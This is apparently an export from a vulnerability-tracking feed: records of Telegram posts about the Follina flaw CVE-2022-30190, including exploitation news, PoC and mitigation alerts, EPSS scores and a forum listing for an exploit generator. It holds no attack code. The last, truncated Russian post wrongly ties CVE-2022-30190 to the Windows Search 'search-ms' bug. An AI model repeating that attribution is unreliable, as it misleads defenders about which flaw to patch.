{"uuid": "380edc6a-f074-454e-8992-d047edf8b892", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "exploited", "source": "https://t.me/package_security/17", "content": "\u200b\ud83c\udfc6 \u0418\u0442\u043e\u0433\u0438 \u0433\u043e\u0434\u0430\n\n\u041d\u0430\u0441\u0442\u0430\u043b\u043e \u0432\u0440\u0435\u043c\u044f \u043d\u0435\u043c\u043d\u043e\u0433\u043e \u043f\u043e\u0433\u043e\u0432\u043e\u0440\u0438\u0442\u044c \u043e \u0440\u0430\u0431\u043e\u0447\u0435\u043c \u043a\u0438\u0431\u0435\u0440\u0431\u0435\u0437\u0435.\n2\u043a22 \u0433\u043e\u0434 \u043d\u0430\u043a\u043e\u043d\u0435\u0446-\u0442\u043e \u043f\u043e\u0434\u0445\u043e\u0434\u0438\u0442 \u043a \u043a\u043e\u043d\u0446\u0443, \u0430 \u044d\u0442\u043e \u0437\u043d\u0430\u0447\u0438\u0442, \u0447\u0442\u043e \u043f\u043e\u0440\u0430 \u043f\u043e\u0434\u0432\u043e\u0434\u0438\u0442\u044c \u0438\u0442\u043e\u0433\u0438.\n\n\u0423 \u043a\u0438\u0431\u0435\u0440\u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u0438\u043a\u043e\u0432, \u043a\u0430\u043a \u0438 \u0432\u0441\u0435\u0433\u0434\u0430, \u0438\u0442\u043e\u0433\u0438 \u0441\u0432\u043e\u0438. \u041f\u043e\u044d\u0442\u043e\u043c\u0443 \u0434\u0435\u0440\u0436\u0438\u0442\u0435 \u0422\u041e\u041f-10 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u0435\u043c\u044b\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 \u0432 2022 \u0433\u043e\u0434\u0443 \u043f\u043e \u0432\u0435\u0440\u0441\u0438\u0438 Cyber Threat Intelligence:\n\n1. Follina (CVE-2022-30190) \n\n2. Log4Shell (CVE-2021-44228) \n\n3. Spring4Shell (CVE-2022-22965) \n\n4. F5 BIG-IP (CVE-2022-1388) \n\n5. Google Chrome zero-day (CVE-2022-0609) \n\n6. Old but not forgotten - Microsoft Office bug (CVE-2017-11882) \n\n7. ProxyNotShell (CVE-2022-41082, CVE-2022-41040) \n\n8. Zimbra Collaboration Suite bugs (CVE-2022-27925, CVE-2022-41352) \n\n9. Atlassian Confluence RCE flaw (CVE-2022-26134) \n\n10. Zyxel RCE vulnerability (CVE-2022-30525)\n\n\u0411\u0443\u0434\u044c\u0442\u0435 \u043e\u0441\u0442\u043e\u0440\u043e\u0436\u043d\u044b, \u0431\u0435\u0440\u0435\u0433\u0438\u0442\u0435 \u0441\u0435\u0431\u044f \u0438 \u0432\u0430\u0448\u0438 \u0441\u0435\u0440\u0432\u0438\u0441\u044b.\nP.S. \u041d\u0438\u0436\u0435 \u0435\u0441\u0442\u044c \u043f\u0438\u043a\u0447\u0430 \u0441 \u043d\u0430\u0433\u043b\u044f\u0434\u043d\u044b\u043c\u0438 \u0438\u043a\u043e\u043d\u043a\u0430\u043c\u0438\n\n#\u041f\u043e\u043b\u0435\u0437\u043d\u043e\u0435\n\n\u041f\u0430\u043a\u0435\u0442 \u0411\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438", "creation_timestamp": "2022-12-16T15:56:36.000000Z"}, {"uuid": "796a807e-345d-401c-a499-9d9987645d0d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/kasperskyb2b/786", "content": "\u2705 \u0413\u043b\u0430\u0432\u043d\u044b\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438: \u043e\u0442\u0447\u0451\u0442 CISA \u0438 \u0438\u0445 \u0430\u043d\u0433\u043b\u043e\u044f\u0437\u044b\u0447\u043d\u044b\u0445 \u0441\u043e\u044e\u0437\u043d\u0438\u043a\u043e\u0432\n\n\u0412 \u0441\u0435\u0440\u0435\u0434\u0438\u043d\u0435 \u0433\u043e\u0434\u0430 \u0432\u044b\u0445\u043e\u0434\u044f\u0442 \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u043e \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u044b\u0445 \u043e\u0442\u0447\u0451\u0442\u043e\u0432, \u043f\u043e\u0441\u0432\u044f\u0449\u0435\u043d\u043d\u044b\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044f\u043c. \u041d\u0435\u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043e\u0445\u0432\u0430\u0442\u044b\u0432\u0430\u044e\u0442 2022 \u0433\u043e\u0434, \u043d\u0435\u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u2014 \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u0438\u0435 12 \u043c\u0435\u0441\u044f\u0446\u0435\u0432, \u043d\u043e \u0432 \u043b\u044e\u0431\u043e\u043c \u0441\u043b\u0443\u0447\u0430\u0435 \u043e\u043d\u0438 \u0434\u043e\u0432\u043e\u043b\u044c\u043d\u043e \u043f\u043e\u0443\u0447\u0438\u0442\u0435\u043b\u044c\u043d\u044b \u0438 \u043f\u0440\u0430\u043a\u0442\u0438\u0447\u043d\u044b. \u041d\u0430\u0447\u043d\u0451\u043c \u0441 \u0431\u043e\u043b\u044c\u0448\u043e\u0433\u043e \u043e\u0442\u0447\u0451\u0442\u0430 \u00ab\u043f\u044f\u0442\u0438\u0433\u043b\u0430\u0437\u044b\u0445\u00bb, \u043f\u043e\u0441\u0432\u044f\u0449\u0451\u043d\u043d\u043e\u0433\u043e \u0433\u043b\u0430\u0432\u043d\u044b\u043c \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044f\u043c, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043f\u043e\u0441\u0442\u043e\u044f\u043d\u043d\u043e \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u043e\u0432\u0430\u043b\u0438\u0441\u044c \u0432 \u0440\u0435\u0430\u043b\u044c\u043d\u044b\u0445 \u0430\u0442\u0430\u043a\u0430\u0445 \u043d\u0430 \u043e\u0440\u0433\u0430\u043d\u0438\u0437\u0430\u0446\u0438\u0438. \n\n\u0413\u043b\u0430\u0432\u043d\u044b\u0439 \u0432\u044b\u0432\u043e\u0434 \u043d\u0435 \u043d\u043e\u0432 \u2014 \u0441\u0430\u043c\u044b\u0435 \u043f\u043e\u043f\u0443\u043b\u044f\u0440\u043d\u044b\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u043d\u0435 \u044f\u0432\u043b\u044f\u044e\u0442\u0441\u044f 0day \u0438\u043b\u0438 1day. \u042d\u0442\u043e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438, \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u044b\u0435 \u0433\u043e\u0434 \u0438\u043b\u0438 \u0434\u0432\u0430, \u0438\u043c\u0435\u044e\u0449\u0438\u0435 PoC \u043d\u0430 Github, \u0434\u0430\u0432\u043d\u043e \u0437\u0430\u043a\u0440\u044b\u0442\u044b\u0435 \u043f\u0430\u0442\u0447\u0430\u043c\u0438, \u043d\u043e \u043f\u0440\u0438 \u044d\u0442\u043e\u043c \u0432\u0441\u0451 \u0440\u0430\u0432\u043d\u043e \u043d\u0435 \u043b\u0438\u043a\u0432\u0438\u0434\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0435 \u0442\u044b\u0441\u044f\u0447\u0430\u043c\u0438 \u0441\u0438\u0441\u0430\u0434\u043c\u0438\u043d\u043e\u0432 \u043f\u043e \u0432\u0441\u0435\u043c\u0443 \u043c\u0438\u0440\u0443.  \u0417\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c \u043d\u0435 \u043d\u0440\u0430\u0432\u0438\u0442\u0441\u044f \u0442\u0440\u0443\u0434\u043d\u0430\u044f \u0440\u0430\u0431\u043e\u0442\u0430, \u043f\u043e\u044d\u0442\u043e\u043c\u0443 \u043e\u043d\u0438 \u043f\u0440\u0435\u0434\u043f\u043e\u0447\u0438\u0442\u0430\u044e\u0442 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0432 \u043f\u0440\u043e\u0434\u0443\u043a\u0442\u0430\u0445, \u0438\u043c\u0435\u044e\u0449\u0438\u0445 \u0432\u0441\u0435\u043c\u0438\u0440\u043d\u043e\u0435 \u043f\u0440\u0438\u043c\u0435\u043d\u0435\u043d\u0438\u0435 \u0432\u043e \u0432\u0441\u0435\u0445 \u0438\u043d\u0434\u0443\u0441\u0442\u0440\u0438\u044f\u0445.\n\n\u0422\u043e\u043f-12 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439: CVE-2018-13379 \u0432 Fortinet SSL VPN, \u0442\u0440\u0438 CVE 2021 \u0433\u043e\u0434\u0430, \u0441\u043e\u0441\u0442\u0430\u0432\u043b\u044f\u044e\u0449\u0438\u0435 ProxyShell, CVE-2021-40539 \u0432 Zoho ManageEngine, CVE-2021-26084 \u0438 -26134 \u0432 Confluence, CVE-2021-44228 Log4Shell, CVE-2022-22954 \u0438 -22960 \u0432 VMWare, CVE-2022-1388 \u0432 F5 BIG-IP,  CVE-2022-30190 \u0432 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u0435 \u0442\u0435\u0445\u043f\u043e\u0434\u0434\u0435\u0440\u0436\u043a\u0438 Windows, MSDT.\n\n\u0415\u0449\u0451 \u0442\u0440\u0438 \u0434\u0435\u0441\u044f\u0442\u043a\u0430 \u0440\u0435\u0433\u0443\u043b\u044f\u0440\u043d\u043e \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u0435\u043c\u044b\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 \u2014 \u0432 \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u043d\u043e\u043c \u043e\u0442\u0447\u0451\u0442\u0435 (\u0430\u043d\u0433\u043b). \u0422\u0430\u043c \u0436\u0435 \u0434\u0430\u043d\u044b \u0434\u0435\u0442\u0430\u043b\u044c\u043d\u044b\u0435 \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0430\u0446\u0438\u0438 \u043e\u0440\u0433\u0430\u043d\u0438\u0437\u0430\u0446\u0438\u044f\u043c \u043f\u043e \u043f\u0440\u0435\u0434\u043e\u0442\u0432\u0440\u0430\u0449\u0435\u043d\u0438\u044e \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u043f\u043e\u0434\u043e\u0431\u043d\u044b\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439. \u0420\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0430\u0446\u0438\u0438 \u0440\u0430\u0437\u0434\u0435\u043b\u0435\u043d\u044b \u043d\u0430 \u043f\u043e\u043d\u044f\u0442\u043d\u044b\u0435 \u0433\u0440\u0443\u043f\u043f\u044b:\n\n\ud83d\udd18\u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044f\u043c\u0438 \u0438 \u043a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u0435\u0439\n\ud83d\udd18\u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0435 \u0434\u043e\u0441\u0442\u0443\u043f\u043e\u043c \u0438 \u0438\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0435\u0439\n\ud83d\udd18\u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u044b \u0437\u0430\u0449\u0438\u0442\u044b \u0438 \u0437\u0430\u0449\u0438\u0449\u0435\u043d\u043d\u0430\u044f \u0430\u0440\u0445\u0438\u0442\u0435\u043a\u0442\u0443\u0440\u0430 \u0441\u0435\u0442\u0438\n\ud83d\udd18\u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u044c \u0446\u0435\u043f\u043e\u0447\u043a\u0438 \u043f\u043e\u0441\u0442\u0430\u0432\u043e\u043a.\n\n#\u043d\u043e\u0432\u043e\u0441\u0442\u0438 #\u0441\u043e\u0432\u0435\u0442\u044b @\u041f2\u0422", "creation_timestamp": "2023-08-07T10:20:52.000000Z"}, {"uuid": "1ee52878-4384-4108-a270-fe5ef7bf490e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "exploited", "source": "https://t.me/BleepingComputer/12590", "content": "Latest news and stories from BleepingComputer.com\nXFiles info-stealing malware adds support for Follina delivery\n\nThe XFiles info-stealer malware has added a delivery module that exploits CVE-2022-30190, aka Follina, for dropping the payload on target computers. [...]", "creation_timestamp": "2022-06-30T14:49:53.000000Z"}, {"uuid": "06f58099-fc14-4ee5-82e3-ae15b1733243", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/2478", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aMitigation for CVE-2022-30190\nURL\uff1ahttps://github.com/k508/CVE-2022-30190\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-06-10T00:25:13.000000Z"}, {"uuid": "b57897e8-9c5d-490a-b73d-df79649096b8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "Telegram/Al5s1pu9DlCNMnH7rJt2q5NFKP_tt6i0TJLpRuR3HfdnDhA", "content": "", "creation_timestamp": "2022-12-05T04:24:48.000000Z"}, {"uuid": "36636268-e5eb-430d-a52f-f85f846f2422", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://t.me/ctinow/76482", "content": "BSidesKC 2022 \u2013 Grant Shanklin\u2019s \u2018Trouble With The Troubleshooter; A Primer On CVE-2022-30190\u2019\n\nhttps://ift.tt/CemSbOE", "creation_timestamp": "2022-11-18T22:46:41.000000Z"}, {"uuid": "b47dabe1-b6fb-4d25-962f-5515b60d08aa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://t.me/ctinow/53234", "content": "CVE-2022-30190 (Follina) vulnerability in MSDT: description and counteraction\n\nhttps://ift.tt/Wjha3VU", "creation_timestamp": "2022-06-06T10:26:35.000000Z"}, {"uuid": "da579da7-39b3-4c9e-8235-f410be24c2d5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://t.me/ctinow/53233", "content": "CVE-2022-30190 (Follina) vulnerability in MSDT: description and counteraction\n\nhttps://ift.tt/Wjha3VU", "creation_timestamp": "2022-06-06T10:26:33.000000Z"}, {"uuid": "7a010773-5369-4fb9-867e-ef40e4ad1f3c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://t.me/ctinow/52923", "content": "Malware \u2013 new OFFICE MSDT based attack CVE-2022-30190\n\nhttps://ift.tt/EP42lVq", "creation_timestamp": "2022-05-31T16:31:42.000000Z"}, {"uuid": "efea7d6f-7a5b-42f4-8ed5-5790f2d2daef", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://t.me/arpsyndicate/1161", "content": "#ExploitObserverAlert\n\nCVE-2022-30190\n\nDESCRIPTION: Exploit Observer has 317 entries related to CVE-2022-30190. Microsoft Windows Support Diagnostic Tool (MSDT) Remote Code Execution Vulnerability.\n\nFIRST-EPSS: 0.973000000\nNVD-IS: 5.9\nNVD-ES: 1.8", "creation_timestamp": "2023-12-04T08:56:35.000000Z"}, {"uuid": "846c29e0-b64a-4f63-bd37-45f15083ed5b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "Telegram/i9m6HRrazEdv2yYTfO5Vg9Qrfq03-5aNzHdOckuUq5U3HrY", "content": "", "creation_timestamp": "2023-07-17T14:40:27.000000Z"}, {"uuid": "1cdd15ce-d096-4e5d-9fed-ad739ec8394c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "Telegram/suSVZ8gjh9CeURgOUMEZq2Z7fyo2iknJlY7RsYX9Hr2cvtw", "content": "", "creation_timestamp": "2023-01-20T07:08:40.000000Z"}, {"uuid": "4fa9fc92-1642-468d-9448-62a0e14b761f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://t.me/arpsyndicate/177", "content": "#ExploitObserverAlert\n\nCVE-2022-30190\n\nDESCRIPTION: Exploit Observer has 308 entries related to CVE-2022-30190. Microsoft Windows Support Diagnostic Tool (MSDT) Remote Code Execution Vulnerability.\n\nFIRST-EPSS: 0.971670000\nNVD-IS: 5.9\nNVD-ES: 1.8", "creation_timestamp": "2023-11-13T21:02:30.000000Z"}, {"uuid": "961cb6bf-2893-4117-87b5-15d528134838", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "exploited", "source": "Telegram/VXX-UF1kIj_skcNHogz47Ob3F5rZG8tp8QVvD5iXH84fvqE", "content": "", "creation_timestamp": "2022-05-31T10:14:55.000000Z"}, {"uuid": "bcd6cfb0-950c-4773-8d10-0b1b937a03b8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://t.me/arpsyndicate/637", "content": "#ExploitObserverAlert\n\nCVE-2022-30190\n\nDESCRIPTION: Exploit Observer has 315 entries related to CVE-2022-30190. Microsoft Windows Support Diagnostic Tool (MSDT) Remote Code Execution Vulnerability.\n\nFIRST-EPSS: 0.973000000\nNVD-IS: 5.9\nNVD-ES: 1.8", "creation_timestamp": "2023-11-28T12:29:25.000000Z"}, {"uuid": "08e9c547-d5a9-4392-949e-6edfc61c4ab8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/wireshark_hacking/771", "content": "Thorough MSDT 0-Day CVE-2022-30190 POC 'Follina'", "creation_timestamp": "2022-11-02T06:14:32.000000Z"}, {"uuid": "a36b01df-bcd7-40d8-b5d3-cbf59ca39e50", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://t.me/arpsyndicate/886", "content": "#ExploitObserverAlert\n\nCVE-2022-30190\n\nDESCRIPTION: Exploit Observer has 317 entries related to CVE-2022-30190. Microsoft Windows Support Diagnostic Tool (MSDT) Remote Code Execution Vulnerability.\n\nFIRST-EPSS: 0.973000000\nNVD-IS: 5.9\nNVD-ES: 1.8", "creation_timestamp": "2023-12-02T03:03:57.000000Z"}, {"uuid": "a8b5c22e-6431-4dfa-9b81-77846de69edc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://t.me/arpsyndicate/754", "content": "#ExploitObserverAlert\n\nCVE-2022-30190\n\nDESCRIPTION: Exploit Observer has 314 entries related to CVE-2022-30190. Microsoft Windows Support Diagnostic Tool (MSDT) Remote Code Execution Vulnerability.\n\nFIRST-EPSS: 0.973000000\nNVD-IS: 5.9\nNVD-ES: 1.8", "creation_timestamp": "2023-11-29T14:42:00.000000Z"}, {"uuid": "660e8fb1-e175-41d0-9fd8-e08b4415a060", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "Telegram/PWf_vvG2Dns7xyv3p7orI9OcjbHcz0BpT-pBWPuIwftS1-g", "content": "", "creation_timestamp": "2025-03-02T16:00:09.000000Z"}, {"uuid": "b029f195-91fd-4226-9588-39bda60ed9e4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "Telegram/PFczZxou3M8bxtA_ogzzcgh7g-AmtdGPjCcJVMEUDXCS9Y4", "content": "", "creation_timestamp": "2025-04-08T17:00:08.000000Z"}, {"uuid": "2f68a12c-cd12-4a9c-bc70-018e615a7365", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "Telegram/Wo1sKu5WvLAnXgcdD3UnX1YZbL6JSQKu1r91lLadtAvpOaI", "content": "", "creation_timestamp": "2025-02-07T10:00:05.000000Z"}, {"uuid": "29bd9245-99d0-4139-8ea2-6735798a35a4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "exploited", "source": "https://t.me/breachdetector/93760", "content": "\u26a0 Detectada filtraci\u00f3n \u26a0\n{\n  \"site\": \"Sinister.ly\",\n  \"Threat Actor\": \"hacxx\",\n  \"Content\": \"Hacxx MSDT 0-Day CVE-2022-30190 Exploit Generator\",\n  \"Detection Date\": \"06 Jun 2022 16:01\",\n  \"Type\": \"Data leak\"\n}\n\ud83d\udd39 Data Leak monitoring system\ud83d\udd39", "creation_timestamp": "2022-06-06T16:03:49.000000Z"}, {"uuid": "a55b9f11-e98a-4b83-8161-b293201f634c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://t.me/nemeZ1da_ru/5466", "content": "\u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u043b\u0438 \u043d\u043e\u0432\u0443\u044e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043d\u0443\u043b\u0435\u0432\u043e\u0433\u043e \u0434\u043d\u044f \u0432 \u043a\u043e\u043c\u043f\u043e\u043d\u0435\u043d\u0442\u0435 \u00ab\u041f\u043e\u0438\u0441\u043a Windows\u00bb (Windows Search) \u2014 CVE-2022-30190. \u041e\u043d\u0430 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c \u043e\u0442\u043a\u0440\u044b\u0432\u0430\u0442\u044c \u043e\u043a\u043d\u0430, \u0441\u043e\u0434\u0435\u0440\u0436\u0430\u0449\u0438\u0435 \u0445\u0440\u0430\u043d\u044f\u0449\u0438\u0435\u0441\u044f \u0443\u0434\u0430\u043b\u0451\u043d\u043d\u043e \u0438\u0441\u043f\u043e\u043b\u043d\u044f\u0435\u043c\u044b\u0435 \u0444\u0430\u0439\u043b\u044b \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0445 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c. \u0410 \u0447\u0442\u043e\u0431\u044b \u043e\u0442\u043a\u0440\u044b\u0442\u044c \u0442\u0430\u043a\u043e\u0435 \u043e\u043a\u043d\u043e, \u0436\u0435\u0440\u0442\u0432\u0435 \u0434\u043e\u0441\u0442\u0430\u0442\u043e\u0447\u043d\u043e \u0437\u0430\u043f\u0443\u0441\u0442\u0438\u0442\u044c \u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442 Word.\n\n\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043d\u0430\u0445\u043e\u0434\u0438\u0442\u0441\u044f \u0432 \u0434\u0438\u0430\u0433\u043d\u043e\u0441\u0442\u0438\u0447\u0435\u0441\u043a\u043e\u043c \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u0435 Microsoft \u2014 MSDT, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0441\u0430\u043c \u043f\u043e \u0441\u0435\u0431\u0435 \u043d\u0435 \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u0442 \u0441\u0435\u0440\u044c\u0451\u0437\u043d\u043e\u0439 \u0443\u0433\u0440\u043e\u0437\u044b. \u041d\u043e \u0435\u0441\u043b\u0438 \u043f\u043e\u0434\u0441\u0443\u043d\u0443\u0442\u044c \u0435\u043c\u0443 \u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442 MS Office, \u0442\u043e \u0445\u0430\u043a\u0435\u0440\u044b \u0441\u043c\u043e\u0433\u0443\u0442 \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u0434\u043e\u0441\u0442\u0443\u043f \u043a \u0441\u0438\u0441\u0442\u0435\u043c\u0435.\n\n\u041f\u0440\u043e\u0431\u043b\u0435\u043c\u0430 \u0432\u043e\u0437\u043d\u0438\u043a\u0430\u0435\u0442 \u043f\u0440\u0438 \u043e\u0431\u0440\u0430\u0431\u043e\u0442\u043a\u0435 URI-\u043f\u0440\u043e\u0442\u043e\u043a\u043e\u043b\u0430 \u00absearch-ms\u00bb, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u044f\u043c \u0438 HTML-\u0441\u0441\u044b\u043b\u043a\u0430\u043c \u0437\u0430\u043f\u0443\u0441\u043a\u0430\u0442\u044c \u043d\u0430\u0441\u0442\u0440\u0430\u0438\u0432\u0430\u0435\u043c\u044b\u0439 \u043f\u043e\u0438\u0441\u043a \u043d\u0430 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0435. \u0422\u0430\u043a\u0438\u0435 \u043f\u043e\u0438\u0441\u043a\u043e\u0432\u044b\u0435 \u0437\u0430\u043f\u0440\u043e\u0441\u044b \u043c\u043e\u0433\u0443\u0442 \u043e\u0431\u0440\u0430\u0449\u0430\u0442\u044c\u0441\u044f \u0432\u043d\u0443\u0442\u0440\u044c \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0430, \u043d\u043e \u00ab\u041f\u043e\u0438\u0441\u043a Windows\u00bb \u0440\u0430\u0441\u0448\u0438\u0440\u044f\u0435\u0442 \u0438\u0445 \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u0438. \u041e\u043d \u043c\u043e\u0436\u0435\u0442 \u0437\u0430\u043f\u0440\u0430\u0448\u0438\u0432\u0430\u0442\u044c \u043e\u0431\u0449\u0438\u0435 \u0444\u0430\u0439\u043b\u043e\u0432\u044b\u0435 \u0440\u0435\u0441\u0443\u0440\u0441\u044b, \u0440\u0430\u0441\u043f\u043e\u043b\u043e\u0436\u0435\u043d\u043d\u044b\u0435 \u043d\u0430 \u0443\u0434\u0430\u043b\u0451\u043d\u043d\u044b\u0445 \u0445\u043e\u0441\u0442\u0430\u0445.\n\n\u041a\u0430\u043a \u044d\u0442\u043e \u0431\u0443\u0434\u0435\u0442 \u0440\u0430\u0431\u043e\u0442\u0430\u0442\u044c?\n\n\u0425\u0430\u043a\u0435\u0440 \u0441\u043e\u0437\u0434\u0430\u0451\u0442 